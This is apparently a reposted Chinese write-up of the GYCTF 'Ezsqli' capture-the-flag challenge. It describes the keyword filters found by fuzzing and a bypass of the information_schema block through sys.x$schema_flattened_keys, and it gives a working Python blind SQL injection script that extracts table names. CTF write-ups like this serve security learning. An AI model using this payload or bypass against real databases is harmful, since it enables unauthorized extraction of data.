标签:GYCTF flag 过滤 Ezsqli table data payload schema
Fuzz
发现过滤了 and or if information_schema union+select合起来的时候会过滤,但分开不过滤 过滤了join regexp
考虑盲注 information_schema被过滤,可以换为sys.x$schema_flattened_keys
fuzz的时候,发现如果查询成功的话会回显Nu1L
爆表名
exp:
# -*- coding: UTF-8 -*- import requests flag='' url='http://9ed82b30-6500-472d-af3b-2c380fc65adc.node3.buuoj.cn/index.php' link=0 for i in range(1,50): for j in range(32,128): payload = "1 && ascii(substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),"+str(i)+",1))="+str(j)+"#" data={ 'id': payload } res=requests.post(url,data=data) if 'Nu1L' in res.text: flag=flag+chr(j) print(flag) link=1 break
标签:GYCTF,flag,过滤,Ezsqli,table,data,payload,schema 来源: https://www.cnblogs.com/tiaopidejun/p/12367855.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。